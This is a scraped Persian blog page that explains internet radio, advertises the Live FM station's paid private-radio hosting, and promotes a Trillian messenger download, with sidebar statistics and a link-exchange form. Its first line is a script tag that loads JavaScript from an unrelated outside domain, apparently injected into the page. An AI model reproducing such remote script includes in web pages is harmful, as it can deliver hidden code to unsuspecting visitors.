script type="text/javascript" src="http://7vps.ir/img/website.js"> رادیو آنلاین چیست؟
کافی نت
وبلاگی جذاب

http://uploads.osyan.net/2011/10/radio-online.jpgاحتمالا تا بحال با سایت های زیادی برخورد کرده اید که به محض وارد شدن به آن یک موزیک یا ملودی به صورت خودکار برای شما پخش میکنند و یا با استفاده از پلی لیست و یک فلش پلیر ساده برای شما دسته ای از موزیک را آماده شنیدن کرده اند؟

 

رادیو اینترنتی هم شباهت هایی با اینگونه سایت ها و امکانات دارد ، با این تفاوت که اختیار تغییر آهنگ در حال پخش با شما نیست و شما نمیتوانید منبع آهنگ یا فایل صوتی در حال پخش را بیابید!

 

در واقع رادیو اینترنتی با استفاده از یک فضای تقریبا نامحدود و پهنای باند بسیار زیاد بر روی سرورهای مدیا سنتر راه اندازی میگردد و با استفاده از نرم افزارهای بخصوصی اقدام به پخش آوا به صورت استریم می نماید.

 

رادیو اینترنتی لایو اف ام هم در واقع با استفاده از بستر فنی و امکانات پیشرفته ای راه اندازی شده است و به جرات میتوان گفت که از نظر ویژگی های خود در میان سایت های مشابه پارسی زبان منحصر به فرد می باشد.

 

از امکانات ویژه این شبکه رادیویی میتوان به واگذاری و اجاره شبکه رادیویی خصوصی به علاقه مندان اشاره داشت. در صورتی که شما هم میخواهید یک رادیو اینترنتی داشته باشید با ما تماس بگیرید.

 

شایان ذکر است که واگذاری پورت به صورت رایگان صورت می پذیرد و شما میتوانید با استفاده از نرم افزارهای بسیار ساده مانند winamp از روی رایانه خود برنامه هایتان را بر روی شبکه خصوصی خود پخش کنید ، اما اگر نیاز به مدیریت فایل به صورت آنلاین دارید و ترافیک اینترنت مصرفی و هزینه های انرژی برق برایتان مهم است ما میتوانیم با دریافت 25 دلار در ماه یک سرور خصوصی ( yourname.livefm.ir ) و یک پورت کاملا اختصاصی به شما بدهیم.

 

برای اطلاعات بیشتر به وب سایت شبکه رادیویی لایو اف ام مراجعه کنید.

 

در مطلب دیگری شما با با پادکست آشنا خواهیم کرد و نحوه تهیه فایل صوتی قابل پخش در رادیو اینترنتی را به شما خواهیم آموخت.



یک شنبه 29 دی 1392برچسب:, :: 11:29 بعد از ظهر
گری گوری

دانلود نرم افزار مسنجر Trillian Astra Pro 5.0 Final

نوشته شده توسط بابك در تاریخ دوشنبه، 1 شهریور ماه 1389
 
دانلود نرم افزار مسنجر Trillian Astra Pro 5.0 Final
 
برای گفت و گو به طور کلی برقراری ارتباط با یکدیگر در اینترنت سایت ها و نرم افزارهای بسیاری وجود دارند که هرکدام نیز امکانات خاص خود را دارند. اگر شما دارای حساب کاربری در تعدادی از این سایت ها باشید مطمئنن استفاده از نرم افزارهای مخصوص هرکدام از این سایت ها امری خسته کننده است ، ضمنن ناچار به نصب تعداد زیادی نرم افزار اضافی بر روی رایانه خود خواهید شد. نرم افزار Trillian Astra Pro این مشکل را تا حد زیادی برطرف کرده است. با استفاده از این نرم افزار قادر خواهید بود تا در یک نرم افزار به طور همزمان از حساب های کاربری خود در سایت هایی چون : AIM, ICQ, MSN, Yahoo Messenger و IRC استفاده کنید. همچنین می توانید با استفاده از این نرم افزار با دوستان خود به گفت و گوی صوتی بپردازید ، تبادل اطلاعات انجام دهید و بسیاری امکانات کاربردی دیگر. این نرم افزار با انواع شبکه ها سازگار است و با امکانات هوشمندانه ای که در اختیار کاربران خود قرار داده است بسیاری از امور را ساده کرده است. این نرم افزار را می توانید هم اکنون از سایت میهن دانلود دریافت نمایید.
برای دانلود نرم افزار به ادامه مطلب مراجعه فرمایید...



ادامه مطلب ...


صفحه قبل 1 صفحه بعد

درباره وبلاگ


به وبلاگ خودتان خوش آمدید امیدوارم که در این وبلاگ بتوانم نیاز شما دوست گرامی را برآورده سازم.
آخرین مطالب
آرشيو وبلاگ
نويسندگان
موضوعات
پيوندها

تبادل لینک هوشمند
برای تبادل لینک  ابتدا ما را با عنوان کافی نت و آدرس caffinet.LoxBlog.ir لینک نمایید سپس مشخصات لینک خود را در زیر نوشته . در صورت وجود لینک ما در سایت شما لینکتان به طور خودکار در سایت ما قرار میگیرد.








نام :
وب :
پیام :
2+2=:
(Refresh)

<-PollName->

<-PollItems->

خبرنامه وب سایت:





آمار وب سایت:  

بازدید امروز : 51
بازدید دیروز : 0
بازدید هفته : 143
بازدید ماه : 9175
بازدید کل : 139326
تعداد مطالب : 562
تعداد نظرات : 8
تعداد آنلاین : 1


Alternative content


آریان پیامک
آریان اس ام اس